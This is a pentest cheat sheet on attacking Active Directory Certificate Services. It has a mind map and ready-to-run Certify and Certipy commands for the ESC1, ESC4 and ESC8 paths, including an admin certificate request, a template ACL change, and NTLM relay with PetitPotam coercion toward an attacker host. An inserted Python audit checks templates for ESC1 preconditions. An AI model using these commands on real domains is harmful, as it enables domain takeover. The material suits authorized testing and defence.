AD CS Attack Paths
Certificate Services exploitation
AD CS Attacks
Interactive Mind Map
graph TD
A[Enumerate AD CS] --> B[Certify/certipy find]
B --> C{Vulnerable Template?}
C -->|ESC1| D[Request as Other User]
C -->|ESC4| E[Modify Template ACL]
C -->|ESC8| F[NTLM Relay to Web Enrollment]
D --> G[Get Admin Certificate]
E --> D
F --> G
G --> H[Authenticate with Cert]
H --> I[Get TGT/NTLM]
I --> J[Domain Access]
Quick Reference
Enumerate AD CS
Certify.exe find /vulnerable # Find vulnerable templates (ESC1, ESC8, etc.)
certipy find -u user@domain -p pass -dc-ip DC # Enumerate AD CS with Certipy
ESC1 - Misconfigured Template
certipy req -u user@domain -p pass -ca CA-NAME -template VulnTemplate -upn admin@domain # Request cert as Admin (ESC1)
certipy auth -pfx admin.pfx # Authenticate with certificate
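As an added example (not code from this page, nor from Certify or Certipy), the Python below applies the same ESC1 preconditions those tools test for to certificate-template attributes, so a template like the one above can be spotted and remediated before it is used. The template records, the `enroll_principals` field and the sample names are constructed; real values come from the Configuration partition via LDAP.

```python
# Added example, not from the page or from Certify/Certipy: an offline audit that
# applies the ESC1 preconditions to template attributes (msPKI-* values stored under
# CN=Certificate Templates in the Configuration partition). Records are constructed.

CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # bit in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # bit in msPKI-Enrollment-Flag (manager approval)
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",        # Client Authentication
    "1.3.6.1.5.2.3.4",          # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",   # Smart Card Logon
    "2.5.29.37.0",              # Any Purpose
}
LOW_PRIV_PRINCIPALS = {"Domain Users", "Authenticated Users", "Everyone", "Domain Computers"}

def esc1_checks(tpl: dict) -> dict:
    """Evaluate each ESC1 precondition; all must hold for the template to be ESC1."""
    ekus = set(tpl.get("pKIExtendedKeyUsage", []))
    return {
        # requester may put any UPN/SAN in the CSR, e.g. a domain admin's
        "enrollee_supplies_subject": bool(tpl.get("msPKI-Certificate-Name-Flag", 0)
                                          & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        # an empty EKU list means "any purpose", which also covers client auth
        "auth_eku": not ekus or bool(ekus & AUTH_EKUS),
        "no_manager_approval": not tpl.get("msPKI-Enrollment-Flag", 0) & CT_FLAG_PEND_ALL_REQUESTS,
        "no_authorized_signatures": tpl.get("msPKI-RA-Signature", 0) == 0,
        # 'enroll_principals' is a constructed field: names holding the Enroll right
        "low_priv_can_enroll": bool(set(tpl.get("enroll_principals", [])) & LOW_PRIV_PRINCIPALS),
    }

def is_esc1(tpl: dict) -> bool:
    return all(esc1_checks(tpl).values())

def audit(templates: list) -> list:
    """Names of templates meeting every ESC1 precondition (breaking any one fixes it)."""
    return [t["name"] for t in templates if is_esc1(t)]

SAMPLE_TEMPLATES = [  # constructed records
    {"name": "VulnTemplate", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
     "enroll_principals": ["Domain Users"]},
    {"name": "UserLike", "msPKI-Certificate-Name-Flag": 0x02000000,  # SAN built from AD
     "msPKI-Enrollment-Flag": 0x0, "msPKI-RA-Signature": 0,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "enroll_principals": ["Domain Users"]},
    {"name": "Approved", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x2,
     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": [], "enroll_principals": ["Domain Users"]},
]

if __name__ == "__main__":
    for t in SAMPLE_TEMPLATES:
        print(t["name"], "ESC1" if is_esc1(t) else "ok", esc1_checks(t))
```

Only VulnTemplate trips every check; clearing the enrollee-supplies-subject flag, requiring manager approval, or restricting the Enroll right each break the chain on its own.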
ESC4 - Template ACL
certipy template -u user@domain -p pass -template VulnTemplate -save-old # Modify template to be vulnerable (ESC4)
ESC8 - NTLM Relay to HTTP
certipy relay -target http://ca-server/certsrv/certfnsh.asp # Start NTLM relay to AD CS
PetitPotam.py attacker-ip dc-ip # Coerce DC authentication to relay